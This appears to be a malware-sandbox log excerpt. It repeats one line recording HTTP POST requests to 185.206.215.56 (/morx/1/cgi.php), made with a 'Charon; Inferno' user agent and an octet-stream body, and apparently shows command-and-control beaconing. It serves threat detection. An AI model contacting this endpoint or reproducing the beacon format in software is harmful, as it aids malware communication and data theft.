Source: global traffic HTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
